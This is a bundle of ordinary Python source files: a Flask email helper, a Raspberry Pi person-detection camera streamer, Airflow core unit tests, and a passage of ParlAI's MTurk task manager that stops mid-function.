from flask_mail import Message
from . import mail
def send_async_email(app, msg):
with app.app_context():
mail.send(msg)
def send_email(to, subject, template, **kwargs):
kwargs['subject'] = subject
app = current_app._get_current_object()
msg = Message(app.config['FLASKY_MAIL_SUBJECT_PREFIX'] + ' ' + subject,
sender=app.config['FLASKY_MAIL_SENDER'], recipients=[to])
msg.body = render_template(template + '.txt', **kwargs)
msg.html = render_template(template + '.html', **kwargs)
thr = Thread(target=send_async_email, args=[app, msg])
thr.start()
return thr
|
Main.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
# from __future__ import absolute_import
# from __future__ import division
# from __future__ import print_function
import argparse
import io
import re
import time
import sys
import json
import picamera
import subprocess
from mbp_client import MBPclient
from ImageRecognitionManager import ImageRecognitionManager
from CameraStreamer import StreamingOutput
from CameraStreamer import StreamingHandler
from CameraStreamer import StreamingServer
from TokenValidationManager import TokenValidationManager
import threading
from PIL import Image
from datetime import datetime
from functools import partial
CAMERA_WIDTH = 640
CAMERA_HEIGHT = 480
def image_rec_thread_function(image_rec_manager, camera, mqtt_client):
while True:
try:
stream = io.BytesIO()
capture = camera.capture(stream, format='jpeg', use_video_port=True)
image = Image.open(stream).convert('RGB').resize((image_rec_manager.input_width, image_rec_manager.input_height), Image.ANTIALIAS)
personWasDetected = image_rec_manager.analize_image(image)
if personWasDetected:
mqtt_client.send_data(1.0)
imgByteArr = io.BytesIO()
image.save(imgByteArr, format='jpeg')
imgByteArr.seek(0)
imgByteArr = imgByteArr.read()
mqtt_client.send_image(imgByteArr)
else:
mqtt_client.send_data(0.0)
except:
error = sys.exc_info()
print("Ending thread. Please wait")
print ('Error:', str(error))
break
def main():
camera = picamera.PiCamera(resolution=(CAMERA_WIDTH, CAMERA_HEIGHT), framerate=30)
parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('--model', help='File path of .tflite file.', required=False, default='detect.tflite')
parser.add_argument(
'--threshold',
help='Score threshold for detected objects.',
required=False,
type=float,
default=0.4)
args = parser.parse_args()
mqtt_client = MBPclient()
mqtt_client.connect()
image_rec_manager = ImageRecognitionManager(args.model, args.threshold)
cs1 = threading.Thread(name='consumer1', target=image_rec_thread_function, args=(image_rec_manager, camera, mqtt_client))
cs1.daemon = True
cs1.start()
streaming_output = StreamingOutput()
token_validation_manager = TokenValidationManager()
camera.start_recording(streaming_output, format='mjpeg')
try:
handler = partial(StreamingHandler, streaming_output, token_validation_manager)
server = StreamingServer(('', 8000), handler)
print ("Starting web server on http://localhost:8000/")
server.serve_forever()
except:
error = sys.exc_info()
print("Ending program. Please wait")
print ('Error:', str(error))
camera.close()
time.sleep(2)
server.shutdown()
time.sleep(2)
mqtt_client.finalize()
time.sleep(2)
return
if __name__ == '__main__':
main()
|
test_core.py | #
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import multiprocessing
import os
import signal
import unittest
from datetime import timedelta
from time import sleep
from dateutil.relativedelta import relativedelta
from numpy.testing import assert_array_almost_equal
from airflow import settings
from airflow.exceptions import AirflowException, AirflowTaskTimeout
from airflow.hooks.base_hook import BaseHook
from airflow.jobs.local_task_job import LocalTaskJob
from airflow.models import DagBag, DagRun, TaskFail, TaskInstance
from airflow.models.baseoperator import BaseOperator
from airflow.models.dag import DAG
from airflow.operators.bash import BashOperator
from airflow.operators.check_operator import CheckOperator, ValueCheckOperator
from airflow.operators.dummy_operator import DummyOperator
from airflow.operators.python import PythonOperator
from airflow.settings import Session
from airflow.utils.dates import infer_time_unit, round_time, scale_time_units
from airflow.utils.state import State
from airflow.utils.timezone import datetime
from airflow.utils.types import DagRunType
from tests.test_utils.config import conf_vars
DEV_NULL = '/dev/null'
DEFAULT_DATE = datetime(2015, 1, 1)
TEST_DAG_ID = 'unit_tests'
class OperatorSubclass(BaseOperator):
"""
An operator to test template substitution
"""
template_fields = ['some_templated_field']
def __init__(self, some_templated_field, *args, **kwargs):
super().__init__(*args, **kwargs)
self.some_templated_field = some_templated_field
def execute(self, context):
pass
class TestCore(unittest.TestCase):
default_scheduler_args = {"num_runs": 1}
def setUp(self):
self.dagbag = DagBag(
dag_folder=DEV_NULL, include_examples=True)
self.args = {'owner': 'airflow', 'start_date': DEFAULT_DATE}
self.dag = DAG(TEST_DAG_ID, default_args=self.args)
self.dag_bash = self.dagbag.dags['example_bash_operator']
self.runme_0 = self.dag_bash.get_task('runme_0')
self.run_after_loop = self.dag_bash.get_task('run_after_loop')
self.run_this_last = self.dag_bash.get_task('run_this_last')
def tearDown(self):
session = Session()
session.query(DagRun).filter(
DagRun.dag_id == TEST_DAG_ID).delete(
synchronize_session=False)
session.query(TaskInstance).filter(
TaskInstance.dag_id == TEST_DAG_ID).delete(
synchronize_session=False)
session.query(TaskFail).filter(
TaskFail.dag_id == TEST_DAG_ID).delete(
synchronize_session=False)
session.commit()
session.close()
def test_check_operators(self):
conn_id = "sqlite_default"
captain_hook = BaseHook.get_hook(conn_id=conn_id) # quite funny :D
captain_hook.run("CREATE TABLE operator_test_table (a, b)")
captain_hook.run("insert into operator_test_table values (1,2)")
op = CheckOperator(
task_id='check',
sql="select count(*) from operator_test_table",
conn_id=conn_id,
dag=self.dag)
op.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
op = ValueCheckOperator(
task_id='value_check',
pass_value=95,
tolerance=0.1,
conn_id=conn_id,
sql="SELECT 100",
dag=self.dag)
op.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
captain_hook.run("drop table operator_test_table")
def test_clear_api(self):
task = self.dag_bash.tasks[0]
task.clear(
start_date=DEFAULT_DATE, end_date=DEFAULT_DATE,
upstream=True, downstream=True)
ti = TaskInstance(task=task, execution_date=DEFAULT_DATE)
ti.are_dependents_done()
def test_illegal_args(self):
"""
Tests that Operators reject illegal arguments
"""
msg = 'Invalid arguments were passed to BashOperator (task_id: test_illegal_args).'
with conf_vars({('operators', 'allow_illegal_arguments'): 'True'}):
with self.assertWarns(PendingDeprecationWarning) as warning:
BashOperator(
task_id='test_illegal_args',
bash_command='echo success',
dag=self.dag,
illegal_argument_1234='hello?')
assert any(msg in str(w) for w in warning.warnings)
def test_illegal_args_forbidden(self):
"""
Tests that operators raise exceptions on illegal arguments when
illegal arguments are not allowed.
"""
with self.assertRaises(AirflowException) as ctx:
BashOperator(
task_id='test_illegal_args',
bash_command='echo success',
dag=self.dag,
illegal_argument_1234='hello?')
self.assertIn(
('Invalid arguments were passed to BashOperator '
'(task_id: test_illegal_args).'),
str(ctx.exception))
def test_bash_operator(self):
op = BashOperator(
task_id='test_bash_operator',
bash_command="echo success",
dag=self.dag)
op.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_bash_operator_multi_byte_output(self):
op = BashOperator(
task_id='test_multi_byte_bash_operator',
bash_command="echo \u2600",
dag=self.dag,
output_encoding='utf-8')
op.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_bash_operator_kill(self):
import psutil
sleep_time = "100%d" % os.getpid()
op = BashOperator(
task_id='test_bash_operator_kill',
execution_timeout=timedelta(seconds=1),
bash_command="/bin/bash -c 'sleep %s'" % sleep_time,
dag=self.dag)
self.assertRaises(
AirflowTaskTimeout,
op.run,
start_date=DEFAULT_DATE, end_date=DEFAULT_DATE)
sleep(2)
pid = -1
for proc in psutil.process_iter():
if proc.cmdline() == ['sleep', sleep_time]:
pid = proc.pid
if pid != -1:
os.kill(pid, signal.SIGTERM)
self.fail("BashOperator's subprocess still running after stopping on timeout!")
def test_on_failure_callback(self):
# Annoying workaround for nonlocal not existing in python 2
data = {'called': False}
def check_failure(context, test_case=self):
data['called'] = True
error = context.get('exception')
test_case.assertIsInstance(error, AirflowException)
op = BashOperator(
task_id='check_on_failure_callback',
bash_command="exit 1",
dag=self.dag,
on_failure_callback=check_failure)
self.assertRaises(
AirflowException,
op.run,
start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
self.assertTrue(data['called'])
def test_dryrun(self):
op = BashOperator(
task_id='test_dryrun',
bash_command="echo success",
dag=self.dag)
op.dry_run()
def test_sqlite(self):
import airflow.providers.sqlite.operators.sqlite
op = airflow.providers.sqlite.operators.sqlite.SqliteOperator(
task_id='time_sqlite',
sql="CREATE TABLE IF NOT EXISTS unitest (dummy VARCHAR(20))",
dag=self.dag)
op.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_timeout(self):
op = PythonOperator(
task_id='test_timeout',
execution_timeout=timedelta(seconds=1),
python_callable=lambda: sleep(5),
dag=self.dag)
self.assertRaises(
AirflowTaskTimeout,
op.run,
start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_python_op(self):
def test_py_op(templates_dict, ds, **kwargs):
if not templates_dict['ds'] == ds:
raise Exception("failure")
op = PythonOperator(
task_id='test_py_op',
python_callable=test_py_op,
templates_dict={'ds': "{{ ds }}"},
dag=self.dag)
op.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_complex_template(self):
def verify_templated_field(context):
self.assertEqual(context['ti'].task.some_templated_field['bar'][1],
context['ds'])
op = OperatorSubclass(
task_id='test_complex_template',
some_templated_field={
'foo': '123',
'bar': ['baz', '{{ ds }}']
},
dag=self.dag)
op.execute = verify_templated_field
op.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_template_non_bool(self):
"""
Test templates can handle objects with no sense of truthiness
"""
class NonBoolObject:
def __len__(self): # pylint: disable=invalid-length-returned
return NotImplemented
def __bool__(self):
return NotImplemented
op = OperatorSubclass(
task_id='test_bad_template_obj',
some_templated_field=NonBoolObject(),
dag=self.dag)
op.resolve_template_files()
def test_task_get_template(self):
TI = TaskInstance
ti = TI(
task=self.runme_0, execution_date=DEFAULT_DATE)
ti.dag = self.dag_bash
ti.run(ignore_ti_state=True)
context = ti.get_template_context()
# DEFAULT DATE is 2015-01-01
self.assertEqual(context['ds'], '2015-01-01')
self.assertEqual(context['ds_nodash'], '20150101')
# next_ds is 2015-01-02 as the dag interval is daily
self.assertEqual(context['next_ds'], '2015-01-02')
self.assertEqual(context['next_ds_nodash'], '20150102')
# prev_ds is 2014-12-31 as the dag interval is daily
self.assertEqual(context['prev_ds'], '2014-12-31')
self.assertEqual(context['prev_ds_nodash'], '20141231')
self.assertEqual(context['ts'], '2015-01-01T00:00:00+00:00')
self.assertEqual(context['ts_nodash'], '20150101T000000')
self.assertEqual(context['ts_nodash_with_tz'], '20150101T000000+0000')
self.assertEqual(context['yesterday_ds'], '2014-12-31')
self.assertEqual(context['yesterday_ds_nodash'], '20141231')
self.assertEqual(context['tomorrow_ds'], '2015-01-02')
self.assertEqual(context['tomorrow_ds_nodash'], '20150102')
def test_local_task_job(self):
TI = TaskInstance
ti = TI(
task=self.runme_0, execution_date=DEFAULT_DATE)
job = LocalTaskJob(task_instance=ti, ignore_ti_state=True)
job.run()
def test_raw_job(self):
TI = TaskInstance
ti = TI(
task=self.runme_0, execution_date=DEFAULT_DATE)
ti.dag = self.dag_bash
ti.run(ignore_ti_state=True)
def test_round_time(self):
rt1 = round_time(datetime(2015, 1, 1, 6), timedelta(days=1))
self.assertEqual(datetime(2015, 1, 1, 0, 0), rt1)
rt2 = round_time(datetime(2015, 1, 2), relativedelta(months=1))
self.assertEqual(datetime(2015, 1, 1, 0, 0), rt2)
rt3 = round_time(datetime(2015, 9, 16, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 16, 0, 0), rt3)
rt4 = round_time(datetime(2015, 9, 15, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 15, 0, 0), rt4)
rt5 = round_time(datetime(2015, 9, 14, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 14, 0, 0), rt5)
rt6 = round_time(datetime(2015, 9, 13, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 14, 0, 0), rt6)
def test_infer_time_unit(self):
self.assertEqual('minutes', infer_time_unit([130, 5400, 10]))
self.assertEqual('seconds', infer_time_unit([110, 50, 10, 100]))
self.assertEqual('hours', infer_time_unit([100000, 50000, 10000, 20000]))
self.assertEqual('days', infer_time_unit([200000, 100000]))
def test_scale_time_units(self):
# use assert_almost_equal from numpy.testing since we are comparing
# floating point arrays
arr1 = scale_time_units([130, 5400, 10], 'minutes')
assert_array_almost_equal(arr1, [2.167, 90.0, 0.167], decimal=3)
arr2 = scale_time_units([110, 50, 10, 100], 'seconds')
assert_array_almost_equal(arr2, [110.0, 50.0, 10.0, 100.0], decimal=3)
arr3 = scale_time_units([100000, 50000, 10000, 20000], 'hours')
assert_array_almost_equal(arr3, [27.778, 13.889, 2.778, 5.556],
decimal=3)
arr4 = scale_time_units([200000, 100000], 'days')
assert_array_almost_equal(arr4, [2.315, 1.157], decimal=3)
def test_bad_trigger_rule(self):
with self.assertRaises(AirflowException):
DummyOperator(
task_id='test_bad_trigger',
trigger_rule="non_existent",
dag=self.dag)
def test_terminate_task(self):
"""If a task instance's db state get deleted, it should fail"""
from airflow.executors.sequential_executor import SequentialExecutor
TI = TaskInstance
dag = self.dagbag.dags.get('test_utils')
task = dag.task_dict.get('sleeps_forever')
ti = TI(task=task, execution_date=DEFAULT_DATE)
job = LocalTaskJob(
task_instance=ti, ignore_ti_state=True, executor=SequentialExecutor())
# Running task instance asynchronously
proc = multiprocessing.Process(target=job.run)
proc.start()
sleep(5)
settings.engine.dispose()
session = settings.Session()
ti.refresh_from_db(session=session)
# making sure it's actually running
self.assertEqual(State.RUNNING, ti.state)
ti = session.query(TI).filter_by(
dag_id=task.dag_id,
task_id=task.task_id,
execution_date=DEFAULT_DATE
).one()
# deleting the instance should result in a failure
session.delete(ti)
session.commit()
# waiting for the async task to finish
proc.join()
# making sure that the task ended up as failed
ti.refresh_from_db(session=session)
self.assertEqual(State.FAILED, ti.state)
session.close()
def test_task_fail_duration(self):
"""If a task fails, the duration should be recorded in TaskFail"""
op1 = BashOperator(
task_id='pass_sleepy',
bash_command='sleep 3',
dag=self.dag)
op2 = BashOperator(
task_id='fail_sleepy',
bash_command='sleep 5',
execution_timeout=timedelta(seconds=3),
retry_delay=timedelta(seconds=0),
dag=self.dag)
session = settings.Session()
try:
op1.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
except Exception: # pylint: disable=broad-except
pass
try:
op2.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
except Exception: # pylint: disable=broad-except
pass
op1_fails = session.query(TaskFail).filter_by(
task_id='pass_sleepy',
dag_id=self.dag.dag_id,
execution_date=DEFAULT_DATE).all()
op2_fails = session.query(TaskFail).filter_by(
task_id='fail_sleepy',
dag_id=self.dag.dag_id,
execution_date=DEFAULT_DATE).all()
self.assertEqual(0, len(op1_fails))
self.assertEqual(1, len(op2_fails))
self.assertGreaterEqual(sum([f.duration for f in op2_fails]), 3)
def test_externally_triggered_dagrun(self):
TI = TaskInstance
# Create the dagrun between two "scheduled" execution dates of the DAG
execution_date = DEFAULT_DATE + timedelta(days=2)
execution_ds = execution_date.strftime('%Y-%m-%d')
execution_ds_nodash = execution_ds.replace('-', '')
dag = DAG(
TEST_DAG_ID,
default_args=self.args,
schedule_interval=timedelta(weeks=1),
start_date=DEFAULT_DATE)
task = DummyOperator(task_id='test_externally_triggered_dag_context',
dag=dag)
dag.create_dagrun(run_type=DagRunType.SCHEDULED,
execution_date=execution_date,
state=State.RUNNING,
external_trigger=True)
task.run(
start_date=execution_date, end_date=execution_date)
ti = TI(task=task, execution_date=execution_date)
context = ti.get_template_context()
# next_ds/prev_ds should be the execution date for manually triggered runs
self.assertEqual(context['next_ds'], execution_ds)
self.assertEqual(context['next_ds_nodash'], execution_ds_nodash)
self.assertEqual(context['prev_ds'], execution_ds)
self.assertEqual(context['prev_ds_nodash'], execution_ds_nodash)
|
mturk_manager.py | #!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import logging
import math
import os
import pickle
import threading
import time
import uuid
import errno
import requests
from parlai.mturk.core.agents import AssignState
from parlai.mturk.core.socket_manager import Packet, SocketManager
from parlai.mturk.core.worker_manager import WorkerManager
from parlai.mturk.core.mturk_data_handler import MTurkDataHandler
import parlai.mturk.core.data_model as data_model
import parlai.mturk.core.mturk_utils as mturk_utils
import parlai.mturk.core.server_utils as server_utils
import parlai.mturk.core.shared_utils as shared_utils
# Timeout before cancelling a world start
WORLD_START_TIMEOUT = 11
# Multiplier to apply when creating hits to ensure worker availibility
HIT_MULT = 1.5
# 6 minute timeout to ensure only one thread updates the time logs.
# Those update once daily in a 3 minute window
RESET_TIME_LOG_TIMEOUT = 360
TIME_LOGS_FILE_NAME = 'working_time.pickle'
TIME_LOGS_FILE_LOCK = 'working_time.lock'
AMAZON_SNS_NAME = 'AmazonMTurk'
SNS_ASSIGN_ABANDONDED = 'AssignmentAbandoned'
SNS_ASSIGN_SUBMITTED = 'AssignmentSubmitted'
SNS_ASSIGN_RETURNED = 'AssignmentReturned'
PARLAI_MTURK_NOTICE_URL = 'http://www.parl.ai/mturk/mturk_notice/'
PARLAI_MTURK_UPLOAD_URL = 'http://www.parl.ai/mturk/mturk_stats/'
PARLAI_CRED_DIR = os.path.expanduser('~/.parlai')
PARLAI_MTURK_LOG_PERMISSION_FILE = \
os.path.join(PARLAI_CRED_DIR, 'mturk_log_permission.pickle')
TWO_WEEKS = 60 * 60 * 24 * 7 * 2
parent_dir = os.path.dirname(os.path.abspath(__file__))
class LockFile():
flags = os.O_CREAT | os.O_EXCL | os.O_WRONLY
def __init__(self, filename):
self.filename = filename
self.fd = None
def __enter__(self):
while self.fd is None:
try:
self.fd = os.open(self.filename, self.flags)
except OSError as e:
if e.errno == errno.EEXIST: # Failed as the file exists.
pass
time.sleep(shared_utils.THREAD_SHORT_SLEEP)
return self
def __exit__(self, *args):
os.close(self.fd)
os.remove(self.filename)
class MTurkManager():
"""Manages interactions between MTurk agents as well as direct interactions
between a world and the MTurk server.
"""
STATE_CREATED = 0 # object created
STATE_SERVER_ALIVE = 1 # heroku server running
STATE_INIT_RUN = 2 # run initialized
STATE_ACCEPTING_WORKERS = 3 # Socket ready to recieve workers
STATE_HITS_MADE = 4 # hits created
def __init__(self, opt, mturk_agent_ids, is_test=False, use_db=False):
"""Create an MTurkManager using the given setup opts and a list of
agent_ids that will participate in each conversation
"""
if not is_test:
try:
import parlai_internal.mturk.configs as local_configs
opt = local_configs.apply_default_opts(opt)
except Exception:
# not all users will be drawing configs from internal settings
pass
self.opt = opt
if self.opt['unique_worker']:
self.opt['allowed_conversations'] = 1
elif self.opt['max_hits_per_worker'] != 0 and \
self.opt['allowed_conversations'] == 0:
self.opt['allowed_conversations'] = self.opt['max_hits_per_worker']
self.server_url = None
self.topic_arn = None
self.server_task_name = None
self.port = 443
self.task_group_id = None
self.run_id = None
self.mturk_agent_ids = mturk_agent_ids
self.task_files_to_copy = None
self.is_sandbox = opt['is_sandbox']
self.agent_pool_change_condition = threading.Condition()
self.onboard_function = None
self.num_conversations = opt['num_conversations']
self.required_hits = math.ceil(
self.num_conversations * len(self.mturk_agent_ids) * HIT_MULT
)
self.minimum_messages = opt.get('min_messages', 0)
self.auto_approve_delay = \
opt.get('auto_approve_delay', 4 * 7 * 24 * 3600)
self.has_time_limit = opt.get('max_time', 0) > 0
self.socket_manager = None
self.worker_manager = WorkerManager(self, opt)
self.is_test = is_test
self.is_unique = False
self.max_hits_per_worker = opt.get('max_hits_per_worker', 0)
self._init_logging_config()
self.is_shutdown = False
self.use_db = use_db # TODO enable always DB integration is complete
self.db_logger = None
self.logging_permitted = False
self.task_state = self.STATE_CREATED
self._assert_opts()
@staticmethod
def make_taskless_instance(is_sandbox=False):
"""Creates an instance without a task to be used for approving or
rejecting assignments, blocking workers, and managing qualifications
"""
opt = {
'unique_worker': False,
'max_hits_per_worker': 0,
'num_conversations': 0,
'is_sandbox': is_sandbox,
'is_debug': False,
'log_level': 30,
}
manager = MTurkManager(opt, [])
manager.is_shutdown = True
mturk_utils.setup_aws_credentials()
return manager
# Helpers and internal manager methods #
def _assert_opts(self):
"""Manages ensuring everything about the passed in options make sense
in that they don't conflict in some way or another"""
if self.opt.get('allow_reviews') and len(self.mturk_agent_ids) != 2:
shared_utils.print_and_log(
logging.WARN,
'[OPT CONFIGURATION ISSUE] '
'allow_reviews is currently only supported on 2 person tasks, '
'overriding this value to false.',
should_print=True
)
self.opt['allow_reviews'] = False
if self.opt.get('frontend_version', 0) < 1:
# Ensure no react only features have been set
features = ['frame_height', 'allow_reviews', 'block_mobile']
for feat in features:
if self.opt.get(feat) is not None:
shared_utils.print_and_log(
logging.WARN,
'[OPT CONFIGURATION ISSUE] '
'{} only works when using the react frontend '
'(frontend_version >= 1), so this option will be '
'ignored'.format(feat),
should_print=True
)
def _init_state(self):
"""Initialize everything in the worker, task, and thread states"""
# TODO handle pooling in own class, note this is an agent_pool
self.agent_pool = []
# TODO move some state to DB
self.hit_id_list = [] # list of outstanding incomplete hits
self.assignment_to_onboard_thread = {}
self.conversation_index = 0
self.started_conversations = 0
self.completed_conversations = 0
self.task_threads = []
self.accepting_workers = True
self._reset_time_logs(init_load=True)
self.qualifications = None
self.unique_qual_name = None
self.time_limit_checked = time.time()
self.task_state = self.STATE_INIT_RUN
self.last_hit_check = time.time()
if self.use_db:
db_filename = 'pmt_sbdata.db' if self.is_sandbox else 'pmt_data.db'
self.db_logger = MTurkDataHandler(self.task_group_id, db_filename)
def _init_logging_config(self):
"""Initialize logging settings from the opt"""
shared_utils.set_is_debug(self.opt['is_debug'])
shared_utils.set_log_level(self.opt['log_level'])
def _logging_permission_check(self):
if self.is_test:
return False
if not os.path.exists(PARLAI_CRED_DIR):
os.makedirs(PARLAI_CRED_DIR)
if os.path.exists(PARLAI_MTURK_LOG_PERMISSION_FILE):
with open(PARLAI_MTURK_LOG_PERMISSION_FILE, 'rb') as perm_file:
permissions = pickle.load(perm_file)
if permissions['allowed'] is True:
return True
elif time.time() - permissions['asked_time'] < TWO_WEEKS:
return False
# Snooze expired
os.remove(PARLAI_MTURK_LOG_PERMISSION_FILE)
print(
'Would you like to help improve ParlAI-MTurk by providing some '
'metrics? We would like to record acceptance, completion, and '
'disconnect rates by worker. These metrics let us track the '
'health of the platform. If you accept we\'ll collect this data '
'on all of your future runs. We\'d ask before collecting anything '
'else, but currently we have no plans to. You can decline to '
'snooze this request for 2 weeks.')
selected = ''
while selected not in ['y', 'Y', 'n', 'N']:
selected = input('Share worker rates? (y/n): ')
if selected not in ['y', 'Y', 'n', 'N']:
print('Must type one of (Y/y/N/n)')
if selected in ['y', 'Y']:
print('Thanks for helping us make the platform better!')
permissions = {
'allowed': selected in ['y', 'Y'],
'asked_time': time.time()
}
with open(PARLAI_MTURK_LOG_PERMISSION_FILE, 'wb+') as perm_file:
pickle.dump(permissions, perm_file)
return permissions['allowed']
def _upload_worker_data(self):
"""Uploads worker data acceptance and completion rates to the parlai
server
"""
worker_data = self.worker_manager.get_worker_data_package()
data = {'worker_data': worker_data}
headers = {'Content-type': 'application/json', 'Accept': 'text/plain'}
requests.post(PARLAI_MTURK_UPLOAD_URL, json=data, headers=headers)
def _maintain_hit_status(self):
def update_status():
while len(self.hit_id_list) > 0:
cur_time = time.time()
if cur_time - self.last_hit_check > 10:
self.last_hit_check = cur_time
for hit_id in self.hit_id_list.copy():
hit = self.get_hit(hit_id)
hit_data = hit['HIT']
if hit_data['HITStatus'] in \
['Reviewable', 'Reviewing', 'Disposed']:
self.hit_id_list.remove(hit_id)
time.sleep(10)
hit_status_thread = threading.Thread(
target=update_status, name='Hit-Status-Thread', daemon=True)
hit_status_thread.start()
def _should_use_time_logs(self):
# Used to ensure time logs are properly tracked. Can be overridden for
# testing
return self.is_sandbox
def _reset_time_logs(self, init_load=False, force=False):
# Uses a weak lock file to try to prevent clobbering between threads
if not self._should_use_time_logs():
return # sandbox doesn't check logs
file_path = os.path.join(parent_dir, TIME_LOGS_FILE_NAME)
file_lock = os.path.join(parent_dir, TIME_LOGS_FILE_LOCK)
with LockFile(file_lock) as _lock_file:
assert _lock_file is not None
if os.path.exists(file_path):
with open(file_path, 'rb+') as time_log_file:
existing_times = pickle.load(time_log_file)
# Initial loads should only reset if it's been a day,
# otherwise only need to check an hour for safety
compare_time = 24 * 60 * 60 if init_load else 60 * 60
if time.time() - existing_times['last_reset'] < \
compare_time and not force:
return # do nothing if it's been less than a day
reset_workers = list(existing_times.keys())
reset_workers.remove('last_reset')
if len(reset_workers) != 0:
self.worker_manager.un_time_block_workers(
reset_workers)
# Reset the time logs
os.remove(file_path)
# new time logs
with open(file_path, 'wb+') as time_log_file:
time_logs = {'last_reset': time.time()}
pickle.dump(time_logs, time_log_file,
pickle.HIGHEST_PROTOCOL)
def _log_working_time(self, mturk_agent):
if not self._should_use_time_logs():
return # sandbox does not log working time
additional_time = time.time() - mturk_agent.creation_time
worker_id = mturk_agent.worker_id
file_path = os.path.join(parent_dir, TIME_LOGS_FILE_NAME)
file_lock = os.path.join(parent_dir, TIME_LOGS_FILE_LOCK)
with LockFile(file_lock) as _lock_file:
assert _lock_file is not None
if not os.path.exists(file_path):
self._reset_time_logs()
with open(file_path, 'rb+') as time_log_file:
existing_times = pickle.load(time_log_file)
total_work_time = existing_times.get(worker_id, 0)
total_work_time += additional_time
existing_times[worker_id] = total_work_time
os.remove(file_path)
with open(file_path, 'wb+') as time_log_file:
pickle.dump(existing_times, time_log_file,
pickle.HIGHEST_PROTOCOL)
if total_work_time > int(self.opt.get('max_time')):
self.worker_manager.time_block_worker(worker_id)
def _move_agents_to_waiting(self, agents):
"""Put all agents into waiting worlds, expire them if no longer
accepting agents. If the agent is already final, clean it
"""
for agent in agents:
worker_id = agent.worker_id
assignment_id = agent.assignment_id
if agent.is_final():
agent.reduce_state()
self.socket_manager.close_channel(agent.get_connection_id())
continue
conversation_id = 'w_{}'.format(uuid.uuid4())
if self.accepting_workers:
# Move the worker into a waiting world
self.worker_manager.change_agent_conversation(
agent=agent,
conversation_id=conversation_id,
new_agent_id='waiting',
)
else:
self.force_expire_hit(worker_id, assignment_id)
def _expire_onboarding_pool(self):
"""Expire any agent that is in an onboarding thread"""
def expire_func(agent):
self.force_expire_hit(agent.worker_id, agent.assignment_id)
def is_onboard(agent):
return agent.get_status() == AssignState.STATUS_ONBOARDING
self.worker_manager.map_over_agents(expire_func, is_onboard)
def _expire_agent_pool(self):
"""Expire all workers in the worker pool"""
for agent in self.agent_pool.copy():
self.force_expire_hit(agent.worker_id, agent.assignment_id)
with self.agent_pool_change_condition:
self._remove_from_agent_pool(agent)
def _get_unique_pool(self, eligibility_function):
"""Return a filtered version of the worker pool where each worker is
only listed a maximum of one time. In sandbox this is overridden for
testing purposes, and the same worker can be returned more than once
"""
pool = [a for a in self.agent_pool if not a.hit_is_returned]
if eligibility_function['multiple'] is True:
agents = eligibility_function['func'](pool)
else:
agents = [a for a in pool if eligibility_function['func'](a)]
unique_agents = []
unique_worker_ids = []
for agent in agents:
if (self.is_sandbox) or (agent.worker_id not in unique_worker_ids):
unique_agents.append(agent)
unique_worker_ids.append(agent.worker_id)
return unique_agents
def _add_agent_to_pool(self, agent):
"""Add a single agent to the pool"""
if agent not in self.agent_pool:
# Add the agent to pool
with self.agent_pool_change_condition:
if agent not in self.agent_pool:
shared_utils.print_and_log(
logging.DEBUG,
"Adding worker {} to pool.".format(agent.worker_id)
)
self.agent_pool.append(agent)
def _remove_from_agent_pool(self, agent):
"""Remove an agent from the pool. should be called under the
agent_pool_change_condition being set.
"""
assert agent in self.agent_pool, 'agent not in pool'
self.agent_pool.remove(agent)
def _handle_agent_disconnect(self, worker_id, assignment_id):
"""Mark a worker as disconnected and send a message to all agents in
his conversation that a partner has disconnected.
"""
self.worker_manager.handle_agent_disconnect(
worker_id, assignment_id, self._handle_partner_disconnect)
def _handle_partner_disconnect(self, agent):
"""Send a message to an agent notifying them that a partner has
disconnected and we marked the HIT as complete for them
"""
if agent is not None and not agent.is_final():
# Update the assignment state
agent.some_agent_disconnected = True
agent_messages = [m for m in agent.get_messages()
if 'id' in m and m['id'] == agent.id]
if len(agent_messages) < self.minimum_messages:
agent.set_status(AssignState.STATUS_PARTNER_DISCONNECT_EARLY)
else:
agent.set_status(AssignState.STATUS_PARTNER_DISCONNECT)
# Create and send the command
data = agent.get_inactive_command_data()
def disconnect_agent(*args):
self.socket_manager.close_channel(
agent.get_connection_id())
self.send_command(agent.worker_id, agent.assignment_id, data,
ack_func=disconnect_agent)
def _restore_agent_state(self, worker_id, assignment_id):
"""Send a command to restore the state of an agent who reconnected"""
agent = self.worker_manager._get_agent(worker_id, assignment_id)
if agent is not None:
agent.alived = False
def send_state_data():
while not agent.alived and not agent.hit_is_expired:
time.sleep(shared_utils.THREAD_SHORT_SLEEP)
data = {
